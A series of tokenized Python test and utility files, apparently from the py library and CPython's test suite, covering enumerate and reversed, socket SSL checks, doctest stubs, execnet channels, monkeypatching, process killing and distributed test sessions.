self . seq ) ) ) , self . res ) <EOL> e = self . enum ( I ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( StopIteration , e . next ) <EOL> def test_iteratorgenerator ( self ) : <EOL> self . assertEqual ( list ( self . enum ( Ig ( self . seq ) ) ) , self . res ) <EOL> e = self . enum ( Ig ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( StopIteration , e . next ) <EOL> def test_noniterable ( self ) : <EOL> self . assertRaises ( TypeError , self . enum , X ( self . seq ) ) <EOL> def test_illformediterable ( self ) : <EOL> self . assertRaises ( TypeError , list , self . enum ( N ( self . seq ) ) ) <EOL> def test_exception_propagation ( self ) : <EOL> self . assertRaises ( ZeroDivisionError , list , self . enum ( E ( self . seq ) ) ) <EOL> def test_argumentcheck ( self ) : <EOL> self . assertRaises ( TypeError , self . enum ) <EOL> self . assertRaises ( TypeError , self . enum , <NUM_LIT:1> ) <EOL> self . assertRaises ( TypeError , self . enum , '<STR_LIT:abc>' , <NUM_LIT:2> ) <EOL> @ test_support . impl_detail ( ) <EOL> def test_tuple_reuse ( self ) : <EOL> self . assertEqual ( len ( set ( map ( id , list ( enumerate ( self . seq ) ) ) ) ) , len ( self . seq ) ) <EOL> self . assertEqual ( len ( set ( map ( id , enumerate ( self . seq ) ) ) ) , min ( <NUM_LIT:1> , len ( self . seq ) ) ) <EOL> class MyEnum ( enumerate ) : <EOL> pass <EOL> class SubclassTestCase ( EnumerateTestCase ) : <EOL> enum = MyEnum <EOL> class TestEmpty ( EnumerateTestCase ) : <EOL> seq , res = '<STR_LIT>' , [ ] <EOL> class TestBig ( EnumerateTestCase ) : <EOL> seq = range ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:2> ) <EOL> res = zip ( range ( <NUM_LIT> ) , seq ) <EOL> class TestReversed ( unittest . TestCase ) : <EOL> def test_simple ( self ) : <EOL> class A : <EOL> def __getitem__ ( self , i ) : <EOL> if i < <NUM_LIT:5> : <EOL> return str ( i ) <EOL> raise StopIteration <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> for data in '<STR_LIT:abc>' , range ( <NUM_LIT:5> ) , tuple ( enumerate ( '<STR_LIT:abc>' ) ) , A ( ) , xrange ( <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:5> ) : <EOL> self . assertEqual ( list ( data ) [ : : - <NUM_LIT:1> ] , list ( reversed ( data ) ) ) <EOL> self . assertRaises ( TypeError , reversed , { } ) <EOL> @ test_support . impl_detail ( ) <EOL> def test_xrange_optimization ( self ) : <EOL> x = xrange ( <NUM_LIT:1> ) <EOL> self . assertEqual ( type ( reversed ( x ) ) , type ( iter ( x ) ) ) <EOL> @ test_support . impl_detail ( ) <EOL> def test_len ( self ) : <EOL> from test . test_iterlen import len <EOL> for s in ( '<STR_LIT:hello>' , tuple ( '<STR_LIT:hello>' ) , list ( '<STR_LIT:hello>' ) , xrange ( <NUM_LIT:5> ) ) : <EOL> self . assertEqual ( len ( reversed ( s ) ) , len ( s ) ) <EOL> r = reversed ( s ) <EOL> list ( r ) <EOL> self . assertEqual ( len ( r ) , <NUM_LIT:0> ) <EOL> class SeqWithWeirdLen : <EOL> called = False <EOL> def __len__ ( self ) : <EOL> if not self . called : <EOL> self . called = True <EOL> return <NUM_LIT:10> <EOL> raise ZeroDivisionError <EOL> def __getitem__ ( self , index ) : <EOL> return index <EOL> r = reversed ( SeqWithWeirdLen ( ) ) <EOL> self . assertRaises ( ZeroDivisionError , len , r ) <EOL> def test_gc ( self ) : <EOL> class Seq : <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:10> <EOL> def __getitem__ ( self , index ) : <EOL> return index <EOL> s = Seq ( ) <EOL> r = reversed ( s ) <EOL> s . r = r <EOL> def test_args ( self ) : <EOL> self . assertRaises ( TypeError , reversed ) <EOL> self . assertRaises ( TypeError , reversed , [ ] , '<STR_LIT>' ) <EOL> def test_bug1229429 ( self ) : <EOL> if not hasattr ( sys , "<STR_LIT>" ) : <EOL> return <EOL> def f ( ) : <EOL> pass <EOL> r = f . __reversed__ = object ( ) <EOL> rc = sys . getrefcount ( r ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> try : <EOL> reversed ( f ) <EOL> except TypeError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> self . assertEqual ( rc , sys . getrefcount ( r ) ) <EOL> def test_main ( verbose = None ) : <EOL> testclasses = ( EnumerateTestCase , SubclassTestCase , TestEmpty , TestBig , <EOL> TestReversed ) <EOL> test_support . run_unittest ( * testclasses ) <EOL> import sys <EOL> if verbose and hasattr ( sys , "<STR_LIT>" ) : <EOL> counts = [ None ] * <NUM_LIT:5> <EOL> for i in xrange ( len ( counts ) ) : <EOL> test_support . run_unittest ( * testclasses ) <EOL> counts [ i ] = sys . gettotalrefcount ( ) <EOL> print counts <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( verbose = True ) </s>
<s> import sys <EOL> from test import test_support <EOL> import socket <EOL> import errno <EOL> skip_expected = not ( test_support . is_resource_enabled ( '<STR_LIT>' ) and <EOL> hasattr ( socket , "<STR_LIT>" ) ) <EOL> def test_basic ( ) : <EOL> test_support . requires ( '<STR_LIT>' ) <EOL> import urllib <EOL> if test_support . verbose : <EOL> print "<STR_LIT>" <EOL> socket . RAND_status ( ) <EOL> try : <EOL> socket . RAND_egd ( <NUM_LIT:1> ) <EOL> except TypeError : <EOL> pass <EOL> else : <EOL> print "<STR_LIT>" <EOL> socket . RAND_add ( "<STR_LIT>" , <NUM_LIT> ) <EOL> try : <EOL> f = urllib . urlopen ( '<STR_LIT>' ) <EOL> except IOError , exc : <EOL> if exc . errno == errno . ETIMEDOUT : <EOL> raise test_support . ResourceDenied ( '<STR_LIT>' ) <EOL> else : <EOL> raise <EOL> buf = f . read ( ) <EOL> f . close ( ) <EOL> def test_timeout ( ) : <EOL> test_support . requires ( '<STR_LIT>' ) <EOL> def error_msg ( extra_msg ) : <EOL> print >> sys . stderr , """<STR_LIT>""" % ( ADDR , extra_msg ) <EOL> if test_support . verbose : <EOL> print "<STR_LIT>" <EOL> ADDR = "<STR_LIT>" , <NUM_LIT> <EOL> s = socket . socket ( ) <EOL> s . settimeout ( <NUM_LIT> ) <EOL> try : <EOL> s . connect ( ADDR ) <EOL> except socket . timeout : <EOL> error_msg ( '<STR_LIT>' ) <EOL> return <EOL> except socket . error , exc : <EOL> if exc . args [ <NUM_LIT:0> ] == errno . ECONNREFUSED : <EOL> error_msg ( '<STR_LIT>' ) <EOL> return <EOL> else : <EOL> raise <EOL> ss = socket . ssl ( s ) <EOL> ss . read ( <NUM_LIT:1> ) <EOL> ss . read ( <NUM_LIT:1> ) <EOL> s . close ( ) <EOL> def test_rude_shutdown ( ) : <EOL> if test_support . verbose : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import threading <EOL> except ImportError : <EOL> return <EOL> PORT = [ <NUM_LIT> ] <EOL> listener_ready = threading . Event ( ) <EOL> listener_gone = threading . Event ( ) <EOL> def listener ( ) : <EOL> s = socket . socket ( ) <EOL> PORT [ <NUM_LIT:0> ] = test_support . bind_port ( s , '<STR_LIT>' , PORT [ <NUM_LIT:0> ] ) <EOL> s . listen ( <NUM_LIT:5> ) <EOL> listener_ready . set ( ) <EOL> s1 , addr = s . accept ( ) <EOL> s1 . close ( ) <EOL> listener_gone . set ( ) <EOL> def connector ( ) : <EOL> listener_ready . wait ( ) <EOL> s = socket . socket ( ) <EOL> s . connect ( ( '<STR_LIT:localhost>' , PORT [ <NUM_LIT:0> ] ) ) <EOL> listener_gone . wait ( ) <EOL> try : <EOL> ssl_sock = socket . ssl ( s ) <EOL> except socket . sslerror , e : <EOL> pass <EOL> else : <EOL> raise test_support . TestFailed ( <EOL> '<STR_LIT>' ) <EOL> t = threading . Thread ( target = listener ) <EOL> t . start ( ) <EOL> connector ( ) <EOL> t . join ( ) <EOL> def test_main ( ) : <EOL> if not hasattr ( socket , "<STR_LIT>" ) : <EOL> raise test_support . TestSkipped ( "<STR_LIT>" ) <EOL> test_rude_shutdown ( ) <EOL> test_basic ( ) <EOL> test_timeout ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( ) </s>
<s> from py . builtin import reversed <EOL> from py . test import raises <EOL> def test_reversed ( ) : <EOL> r = reversed ( "<STR_LIT:hello>" ) <EOL> assert iter ( r ) is r <EOL> assert r . next ( ) == "<STR_LIT:o>" <EOL> assert r . next ( ) == "<STR_LIT:l>" <EOL> assert r . next ( ) == "<STR_LIT:l>" <EOL> assert r . next ( ) == "<STR_LIT:e>" <EOL> assert r . next ( ) == "<STR_LIT:h>" <EOL> raises ( StopIteration , r . next ) <EOL> assert list ( reversed ( list ( reversed ( "<STR_LIT:hello>" ) ) ) ) == [ '<STR_LIT:h>' , '<STR_LIT:e>' , '<STR_LIT:l>' , '<STR_LIT:l>' , '<STR_LIT:o>' ] <EOL> raises ( TypeError , reversed , reversed ( "<STR_LIT:hello>" ) ) </s>
<s> """<STR_LIT>""" <EOL> from test import test_support <EOL> import warnings <EOL> import py <EOL> doctest = py . compat . doctest <EOL> import sys <EOL> sys . modules [ '<STR_LIT>' ] = py . compat . doctest <EOL> def sample_func ( v ) : <EOL> """<STR_LIT>""" <EOL> return v + v <EOL> class SampleClass : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , val ) : <EOL> """<STR_LIT>""" <EOL> self . val = val <EOL> def double ( self ) : <EOL> """<STR_LIT>""" <EOL> return SampleClass ( self . val + self . val ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . val <EOL> def a_staticmethod ( v ) : <EOL> """<STR_LIT>""" <EOL> return v + <NUM_LIT:1> <EOL> a_staticmethod = staticmethod ( a_staticmethod ) <EOL> def a_classmethod ( cls , v ) : <EOL> """<STR_LIT>""" <EOL> return v + <NUM_LIT:2> <EOL> a_classmethod = classmethod ( a_classmethod ) <EOL> a_property = property ( get , doc = """<STR_LIT>""" ) <EOL> class NestedClass : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , val = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> self . val = val <EOL> def square ( self ) : <EOL> return SampleClass . NestedClass ( self . val * self . val ) <EOL> def get ( self ) : <EOL> return self . val <EOL> class SampleNewStyleClass ( object ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , val ) : <EOL> """<STR_LIT>""" <EOL> self . val = val <EOL> def double ( self ) : <EOL> """<STR_LIT>""" <EOL> return SampleNewStyleClass ( self . val + self . val ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . val <EOL> class _FakeInput : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , lines ) : <EOL> self . lines = lines <EOL> def readline ( self ) : <EOL> line = self . lines . pop ( <NUM_LIT:0> ) <EOL> print line <EOL> return line + '<STR_LIT:\n>' <EOL> def test_Example ( ) : r"""<STR_LIT>""" <EOL> def test_DocTest ( ) : r"""<STR_LIT>""" <EOL> def test_DocTestFinder ( ) : r"""<STR_LIT>""" <EOL> def test_DocTestParser ( ) : r"""<STR_LIT>""" <EOL> class test_DocTestRunner : <EOL> def basics ( ) : r"""<STR_LIT>""" <EOL> def verbose_flag ( ) : r"""<STR_LIT>""" <EOL> def exceptions ( ) : r"""<STR_LIT>""" <EOL> def optionflags ( ) : r"""<STR_LIT>""" <EOL> def option_directives ( ) : r"""<STR_LIT>""" <EOL> def test_testsource ( ) : r"""<STR_LIT>""" <EOL> def test_debug ( ) : r"""<STR_LIT>""" <EOL> def test_pdb_set_trace ( ) : <EOL> """<STR_LIT>""" <EOL> def test_pdb_set_trace_nested ( ) : <EOL> """<STR_LIT>""" <EOL> def test_DocTestSuite ( ) : <EOL> """<STR_LIT>""" <EOL> def test_DocFileSuite ( ) : <EOL> """<STR_LIT>""" <EOL> def test_trailing_space_in_test ( ) : <EOL> """<STR_LIT>""" <EOL> def test_unittest_reportflags ( ) : <EOL> """<STR_LIT>""" <EOL> def test_testfile ( ) : r"""<STR_LIT>""" <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , "<STR_LIT>" , DeprecationWarning , <EOL> __name__ , <NUM_LIT:0> ) <EOL> def old_test1 ( ) : r"""<STR_LIT>""" <EOL> def old_test2 ( ) : r"""<STR_LIT>""" <EOL> def old_test3 ( ) : r"""<STR_LIT>""" <EOL> def old_test4 ( ) : """<STR_LIT>""" <EOL> def test_main ( ) : <EOL> test_support . run_doctest ( doctest , verbosity = True ) <EOL> from test import test_doctest <EOL> test_support . run_doctest ( test_doctest , verbosity = True ) <EOL> import trace , sys , re , StringIO <EOL> def test_coverage ( coverdir ) : <EOL> tracer = trace . Trace ( ignoredirs = [ sys . prefix , sys . exec_prefix , ] , <EOL> trace = <NUM_LIT:0> , count = <NUM_LIT:1> ) <EOL> tracer . run ( '<STR_LIT>' ) <EOL> r = tracer . results ( ) <EOL> print '<STR_LIT>' <EOL> r . write_results ( show_missing = True , summary = True , <EOL> coverdir = coverdir ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if '<STR_LIT:-c>' in sys . argv : <EOL> test_coverage ( '<STR_LIT>' ) <EOL> else : <EOL> test_main ( ) </s>
<s> """<STR_LIT>""" <EOL> import py <EOL> class TestMultiChannelAndGateway : <EOL> def test_multichannel_receive_each ( self ) : <EOL> class pseudochannel : <EOL> def receive ( self ) : <EOL> return <NUM_LIT:12> <EOL> pc1 = pseudochannel ( ) <EOL> pc2 = pseudochannel ( ) <EOL> multichannel = py . execnet . MultiChannel ( [ pc1 , pc2 ] ) <EOL> l = multichannel . receive_each ( withchannel = True ) <EOL> assert len ( l ) == <NUM_LIT:2> <EOL> assert l == [ ( pc1 , <NUM_LIT:12> ) , ( pc2 , <NUM_LIT:12> ) ] <EOL> l = multichannel . receive_each ( withchannel = False ) <EOL> assert l == [ <NUM_LIT:12> , <NUM_LIT:12> ] <EOL> def test_multichannel_send_each ( self ) : <EOL> l = [ py . execnet . PopenGateway ( ) for x in range ( <NUM_LIT:2> ) ] <EOL> gm = py . execnet . MultiGateway ( l ) <EOL> mc = gm . remote_exec ( """<STR_LIT>""" ) <EOL> mc . send_each ( <NUM_LIT> ) <EOL> l = mc . receive_each ( ) <EOL> assert l == [ <NUM_LIT> , <NUM_LIT> ] <EOL> def test_multichannel_receive_queue_for_two_subprocesses ( self ) : <EOL> l = [ py . execnet . PopenGateway ( ) for x in range ( <NUM_LIT:2> ) ] <EOL> gm = py . execnet . MultiGateway ( l ) <EOL> mc = gm . remote_exec ( """<STR_LIT>""" ) <EOL> queue = mc . make_receive_queue ( ) <EOL> ch , item = queue . get ( timeout = <NUM_LIT:10> ) <EOL> ch2 , item2 = queue . get ( timeout = <NUM_LIT:10> ) <EOL> assert ch != ch2 <EOL> assert ch . gateway != ch2 . gateway <EOL> assert item != item2 <EOL> mc . waitclose ( ) <EOL> def test_multichannel_waitclose ( self ) : <EOL> l = [ ] <EOL> class pseudochannel : <EOL> def waitclose ( self ) : <EOL> l . append ( <NUM_LIT:0> ) <EOL> multichannel = py . execnet . MultiChannel ( [ pseudochannel ( ) , pseudochannel ( ) ] ) <EOL> multichannel . waitclose ( ) <EOL> assert len ( l ) == <NUM_LIT:2> </s>
<s> patched = { } <EOL> def patch ( namespace , name , value ) : <EOL> """<STR_LIT>""" <EOL> nref = ( namespace , name ) <EOL> orig = getattr ( namespace , name ) <EOL> patched . setdefault ( nref , [ ] ) . append ( orig ) <EOL> setattr ( namespace , name , value ) <EOL> return orig <EOL> def revert ( namespace , name ) : <EOL> """<STR_LIT>""" <EOL> nref = ( namespace , name ) <EOL> if nref not in patched or not patched [ nref ] : <EOL> raise ValueError , "<STR_LIT>" % nref <EOL> current = getattr ( namespace , name ) <EOL> orig = patched [ nref ] . pop ( ) <EOL> setattr ( namespace , name , orig ) <EOL> return current </s>
<s> import os <EOL> import py <EOL> from py . __ . misc . terminal_helper import get_terminal_width <EOL> def test_terminal_width ( ) : <EOL> """<STR_LIT>""" <EOL> assert get_terminal_width ( ) <EOL> try : <EOL> import fcntl <EOL> except ImportError : <EOL> py . test . skip ( '<STR_LIT>' ) <EOL> def f ( * args ) : <EOL> raise ValueError <EOL> ioctl = fcntl . ioctl <EOL> fcntl . ioctl = f <EOL> try : <EOL> cols = os . environ . get ( '<STR_LIT>' , None ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert get_terminal_width ( ) == <NUM_LIT> <EOL> finally : <EOL> fcntl . ioctl = ioctl <EOL> if cols : <EOL> os . environ [ '<STR_LIT>' ] = cols </s>
<s> import py <EOL> import os , sys <EOL> if sys . platform == "<STR_LIT:win32>" : <EOL> try : <EOL> import ctypes <EOL> except ImportError : <EOL> def dokill ( pid ) : <EOL> py . process . cmdexec ( "<STR_LIT>" % ( pid , ) ) <EOL> else : <EOL> def dokill ( pid ) : <EOL> PROCESS_TERMINATE = <NUM_LIT:1> <EOL> handle = ctypes . windll . kernel32 . OpenProcess ( <EOL> PROCESS_TERMINATE , False , pid ) <EOL> ctypes . windll . kernel32 . TerminateProcess ( handle , - <NUM_LIT:1> ) <EOL> ctypes . windll . kernel32 . CloseHandle ( handle ) <EOL> else : <EOL> def dokill ( pid ) : <EOL> os . kill ( pid , <NUM_LIT:15> ) <EOL> def kill ( pid ) : <EOL> """<STR_LIT>""" <EOL> dokill ( pid ) </s>
<s> from py . __ . test . dist . dsession import DSession <EOL> from py . __ . test import outcome <EOL> import py <EOL> XSpec = py . execnet . XSpec <EOL> def run ( item , node , excinfo = None ) : <EOL> runner = item . config . pluginmanager . getplugin ( "<STR_LIT>" ) <EOL> rep = runner . ItemTestReport ( item = item , <EOL> excinfo = excinfo , when = "<STR_LIT>" ) <EOL> rep . node = node <EOL> return rep <EOL> class MockNode : <EOL> def __init__ ( self ) : <EOL> self . sent = [ ] <EOL> def sendlist ( self , items ) : <EOL> self . sent . append ( items ) <EOL> def shutdown ( self ) : <EOL> self . _shutdown = True <EOL> def dumpqueue ( queue ) : <EOL> while queue . qsize ( ) : <EOL> print queue . get ( ) <EOL> class TestDSession : <EOL> def test_add_remove_node ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> node = MockNode ( ) <EOL> rep = run ( item , node ) <EOL> session = DSession ( item . config ) <EOL> assert not session . node2pending <EOL> session . addnode ( node ) <EOL> assert len ( session . node2pending ) == <NUM_LIT:1> <EOL> session . senditems_load ( [ item ] ) <EOL> pending = session . removenode ( node ) <EOL> assert pending == [ item ] <EOL> assert item not in session . item2nodes <EOL> l = session . removenode ( node ) <EOL> assert not l <EOL> def test_senditems_each_and_receive_with_two_nodes ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> node1 = MockNode ( ) <EOL> node2 = MockNode ( ) <EOL> session = DSession ( item . config ) <EOL> session . addnode ( node1 ) <EOL> session . addnode ( node2 ) <EOL> session . senditems_each ( [ item ] ) <EOL> assert session . node2pending [ node1 ] == [ item ] <EOL> assert session . node2pending [ node2 ] == [ item ] <EOL> assert node1 in session . item2nodes [ item ] <EOL> assert node2 in session . item2nodes [ item ] <EOL> session . removeitem ( item , node1 ) <EOL> assert session . item2nodes [ item ] == [ node2 ] <EOL> session . removeitem ( item , node2 ) <EOL> assert not session . node2pending [ node1 ] <EOL> assert not session . item2nodes <EOL> def test_senditems_load_and_receive_one_node ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> node = MockNode ( ) <EOL> rep = run ( item , node ) <EOL> session = DSession ( item . config ) <EOL> session . addnode ( node ) <EOL> session . senditems_load ( [ item ] ) <EOL> assert session . node2pending [ node ] == [ item ] <EOL> assert session . item2nodes [ item ] == [ node ] <EOL> session . removeitem ( item , node ) <EOL> assert not session . node2pending [ node ] <EOL> assert not session . item2nodes <EOL> def test_triggertesting_collect ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> session = DSession ( modcol . config ) <EOL> session . triggertesting ( [ modcol ] ) <EOL> name , args , kwargs = session . queue . get ( block = False ) <EOL> assert name == '<STR_LIT>' <EOL> report = kwargs [ '<STR_LIT>' ] <EOL> assert len ( report . result ) == <NUM_LIT:1> <EOL> def test_triggertesting_item ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node1 = MockNode ( ) <EOL> node2 = MockNode ( ) <EOL> session . addnode ( node1 ) <EOL> session . addnode ( node2 ) <EOL> session . triggertesting ( [ item ] * ( session . MAXITEMSPERHOST * <NUM_LIT:2> + <NUM_LIT:1> ) ) <EOL> sent1 = node1 . sent [ <NUM_LIT:0> ] <EOL> sent2 = node2 . sent [ <NUM_LIT:0> ] <EOL> assert sent1 == [ item ] * session . MAXITEMSPERHOST <EOL> assert sent2 == [ item ] * session . MAXITEMSPERHOST <EOL> assert session . node2pending [ node1 ] == sent1 <EOL> assert session . node2pending [ node2 ] == sent2 <EOL> name , args , kwargs = session . queue . get ( block = False ) <EOL> assert name == "<STR_LIT>" <EOL> assert kwargs [ '<STR_LIT>' ] == [ item ] <EOL> def test_keyboardinterrupt ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> def raise_ ( timeout = None ) : raise KeyboardInterrupt ( ) <EOL> session . queue . get = raise_ <EOL> exitstatus = session . loop ( [ ] ) <EOL> assert exitstatus == outcome . EXIT_INTERRUPTED <EOL> def test_internalerror ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> def raise_ ( ) : raise ValueError ( ) <EOL> session . queue . get = raise_ <EOL> exitstatus = session . loop ( [ ] ) <EOL> assert exitstatus == outcome . EXIT_INTERNALERROR <EOL> def test_rescheduleevent ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> session . queueevent ( "<STR_LIT>" , items = [ item ] ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . dowork == False <EOL> session . queueevent ( None ) <EOL> session . loop_once ( loopstate ) <EOL> session . queueevent ( None ) <EOL> session . loop_once ( loopstate ) <EOL> assert node . sent == [ [ item ] ] <EOL> session . queueevent ( "<STR_LIT>" , report = run ( item , node ) ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . shuttingdown <EOL> assert not loopstate . testsfailed <EOL> def test_no_node_remaining_for_tests ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = None ) <EOL> loopstate = session . _initloopstate ( [ item ] ) <EOL> loopstate . dowork = False <EOL> session . loop_once ( loopstate ) <EOL> dumpqueue ( session . queue ) <EOL> assert loopstate . exitstatus == outcome . EXIT_NOHOSTS <EOL> def test_removeitem_from_failing_teardown ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> item1 , = modcol . collect ( ) <EOL> session = DSession ( item1 . config ) <EOL> node1 , node2 = MockNode ( ) , MockNode ( ) <EOL> session . addnode ( node1 ) <EOL> session . addnode ( node2 ) <EOL> session . senditems_each ( [ item1 ] ) <EOL> nodes = session . item2nodes [ item1 ] <EOL> class rep : <EOL> failed = True <EOL> item = item1 <EOL> node = nodes [ <NUM_LIT:0> ] <EOL> when = "<STR_LIT>" <EOL> session . queueevent ( "<STR_LIT>" , report = rep ) <EOL> reprec = testdir . getreportrecorder ( session ) <EOL> print session . item2nodes <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> assert len ( session . item2nodes [ item1 ] ) == <NUM_LIT:2> <EOL> session . loop_once ( loopstate ) <EOL> assert len ( session . item2nodes [ item1 ] ) == <NUM_LIT:1> <EOL> rep . when = "<STR_LIT>" <EOL> session . queueevent ( "<STR_LIT>" , report = rep ) <EOL> session . loop_once ( loopstate ) <EOL> assert len ( session . item2nodes [ item1 ] ) == <NUM_LIT:1> <EOL> def test_testnodedown_causes_reschedule_pending ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> item1 , item2 = modcol . collect ( ) <EOL> session = DSession ( item1 . config ) <EOL> node1 , node2 = MockNode ( ) , MockNode ( ) <EOL> session . addnode ( node1 ) <EOL> session . addnode ( node2 ) <EOL> session . senditems_load ( [ item1 , item2 ] ) <EOL> node = session . item2nodes [ item1 ] [ <NUM_LIT:0> ] <EOL> item1 . config . option . dist = "<STR_LIT>" <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = "<STR_LIT>" ) <EOL> reprec = testdir . getreportrecorder ( session ) <EOL> print session . item2nodes <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . colitems == [ item2 ] <EOL> rep = reprec . matchreport ( names = "<STR_LIT>" ) <EOL> assert rep . failed <EOL> assert rep . item == item1 <EOL> assert str ( rep . longrepr ) . find ( "<STR_LIT>" ) != - <NUM_LIT:1> <EOL> def test_testnodeready_adds_to_available ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node1 = MockNode ( ) <EOL> session . queueevent ( "<STR_LIT>" , node = node1 ) <EOL> loopstate = session . _initloopstate ( [ item ] ) <EOL> loopstate . dowork = False <EOL> assert len ( session . node2pending ) == <NUM_LIT:0> <EOL> session . loop_once ( loopstate ) <EOL> assert len ( session . node2pending ) == <NUM_LIT:1> <EOL> def runthrough ( self , item , excinfo = None ) : <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> loopstate = session . _initloopstate ( [ item ] ) <EOL> session . queueevent ( None ) <EOL> session . loop_once ( loopstate ) <EOL> assert node . sent == [ [ item ] ] <EOL> ev = run ( item , node , excinfo = excinfo ) <EOL> session . queueevent ( "<STR_LIT>" , report = ev ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . shuttingdown <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = None ) <EOL> session . loop_once ( loopstate ) <EOL> dumpqueue ( session . queue ) <EOL> return session , loopstate . exitstatus <EOL> def test_exit_completed_tests_ok ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session , exitstatus = self . runthrough ( item ) <EOL> assert exitstatus == outcome . EXIT_OK <EOL> def test_exit_completed_tests_fail ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session , exitstatus = self . runthrough ( item , excinfo = "<STR_LIT>" ) <EOL> assert exitstatus == outcome . EXIT_TESTSFAILED <EOL> def test_exit_on_first_failing ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> modcol . config . option . exitfirst = True <EOL> session = DSession ( modcol . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> items = modcol . config . hook . pytest_make_collect_report ( collector = modcol ) . result <EOL> session . triggertesting ( items ) <EOL> ev1 = run ( items [ <NUM_LIT:0> ] , node , "<STR_LIT>" ) <EOL> ev2 = run ( items [ <NUM_LIT:1> ] , node , None ) <EOL> session . queueevent ( "<STR_LIT>" , report = ev1 ) <EOL> session . queueevent ( "<STR_LIT>" , report = ev2 ) <EOL> loopstate = session . _initloopstate ( items ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . testsfailed <EOL> assert loopstate . shuttingdown <EOL> def test_shuttingdown_filters ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> loopstate . shuttingdown = True <EOL> reprec = testdir . getreportrecorder ( session ) <EOL> session . queueevent ( "<STR_LIT>" , report = run ( item , node ) ) <EOL> session . loop_once ( loopstate ) <EOL> assert not reprec . getcalls ( "<STR_LIT>" ) <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = None ) <EOL> session . loop_once ( loopstate ) <EOL> assert reprec . getcall ( '<STR_LIT>' ) . node == node <EOL> def test_filteritems ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> session = DSession ( modcol . config ) <EOL> modcol . config . option . keyword = "<STR_LIT>" <EOL> dsel = session . filteritems ( [ modcol ] ) <EOL> assert dsel == [ modcol ] <EOL> items = modcol . collect ( ) <EOL> hookrecorder = testdir . getreportrecorder ( session ) . hookrecorder <EOL> remaining = session . filteritems ( items ) <EOL> assert remaining == [ ] <EOL> event = hookrecorder . getcalls ( "<STR_LIT>" ) [ - <NUM_LIT:1> ] <EOL> assert event . items == items <EOL> modcol . config . option . keyword = "<STR_LIT>" <EOL> remaining = session . filteritems ( items ) <EOL> assert remaining == [ items [ <NUM_LIT:0> ] ] <EOL> event = hookrecorder . getcalls ( "<STR_LIT>" ) [ - <NUM_LIT:1> ] <EOL> assert event . items == [ items [ <NUM_LIT:1> ] ] <EOL> def test_testnodedown_shutdown_after_completion ( self , testdir ) : <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> session = DSession ( item . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> session . senditems_load ( [ item ] ) <EOL> session . queueevent ( "<STR_LIT>" , report = run ( item , node ) ) <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> session . loop_once ( loopstate ) <EOL> assert node . _shutdown is True <EOL> assert loopstate . exitstatus is None , 